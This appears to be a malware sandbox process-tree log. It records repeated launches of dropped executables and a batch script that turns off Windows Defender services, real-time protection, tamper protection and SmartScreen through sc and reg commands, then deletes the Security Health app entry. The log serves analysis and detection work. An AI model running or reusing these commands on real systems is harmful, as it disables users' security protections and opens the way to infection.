C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9628
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9116
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:2288
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10496
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11840
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11460
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10584
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6068
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12060
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10904
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:3104
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7724
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10656
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8140
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8472
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10264
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9756
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5452
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4828
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:3076
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8164
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9964
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7604
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12580
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12516
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11980
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11700
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10700
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6616
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7576
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1644⤵
- Program crash
PID:9552
-
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6740
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:1568
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4840
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:1976
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12832
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6668
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:3512
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11100
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8024 -s 1644⤵
- Program crash
PID:2044
-
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12676
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11820
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12484
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:13260
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5664
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4528
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:2964
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9064
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7500
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11804
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12888
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:3592
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11064
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9632
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:2744
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10996
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7092
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:13040
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9460
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9408
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12212
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8804
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6732
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5168
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5780
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12652
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4440
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8556
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9272
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9948
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:816
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10008
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4116
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:2124
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8308
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4424
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5140
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Enumerates connected drives
PID:8032
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6492
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10468
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12596
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:2440
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10860
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:3944
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 284⤵
- Program crash
PID:1632
-
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:13032
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5620
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:1000
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10352
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:2448
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4972
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:3664
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6196
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8568
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:3268
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12184
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11524
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11212
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:13080
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9924
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7104
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9560
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5144
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:1068
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9836
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10488
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12756
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9308
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10580
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:3584
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9248
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11748
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6200
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12400
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9608
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7772
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9024
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8476
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9016
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12392 -s 284⤵
- Program crash
PID:9580
-
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10984
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6348
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8324
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12052
-
-
-
C:\Users\Admin\Documents\m21dPxSXvr2n3Za8XSXjPJgV.exe"C:\Users\Admin\Documents\m21dPxSXvr2n3Za8XSXjPJgV.exe"2⤵
- Executes dropped EXE
PID:340 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 340 -s 2363⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1204
-
-
-
C:\Users\Admin\Documents\7r8eheenr48ifSwYOruBNk3H.exe"C:\Users\Admin\Documents\7r8eheenr48ifSwYOruBNk3H.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:968
-
-
C:\Users\Admin\Documents\114ea3iZuW8lGHU596f7SwEr.exe"C:\Users\Admin\Documents\114ea3iZuW8lGHU596f7SwEr.exe"2⤵
- Executes dropped EXE
PID:1288 -
C:\Users\Admin\AppData\Local\Temp\5QJ2f9SU.com"C:\Users\Admin\AppData\Local\Temp\5QJ2f9SU.com"3⤵
- Executes dropped EXE
PID:3032 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3307.tmp\3308.tmp\3309.bat C:\Users\Admin\AppData\Local\Temp\5QJ2f9SU.com"4⤵PID:5676
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled5⤵PID:4896
-
-
C:\Windows\system32\sc.exesc config SecurityHealthService start=disabled5⤵PID:2548
-
-
C:\Windows\system32\sc.exesc config Sense start=disabled5⤵PID:5436
-
-
C:\Windows\system32\sc.exesc config WdNisDrv start=disabled5⤵PID:1896
-
-
C:\Windows\system32\sc.exesc config WdNisSvc start=disabled5⤵PID:3440
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:6212
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵PID:6584
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:6916
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵PID:6208
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f5⤵PID:6000
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f5⤵PID:7068
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f5⤵PID:7084
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵PID:7160
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵PID:5668
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵PID:72
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵PID:7044
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵PID:4204
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵PID:6744
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f5⤵PID:2216
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f5⤵PID:7196
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:7760
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI" | find /i "SecHealthUI"5⤵PID:8028
-
C:\Windows\system32\find.exefind /i "SecHealthUI"6⤵PID:8156
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI"6⤵PID:3100
-
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\Microsoft.SecHealthUI_1000.22000.1.0_neutral__8wekyb3d8bbwe" /f5⤵PID:7188
-
-
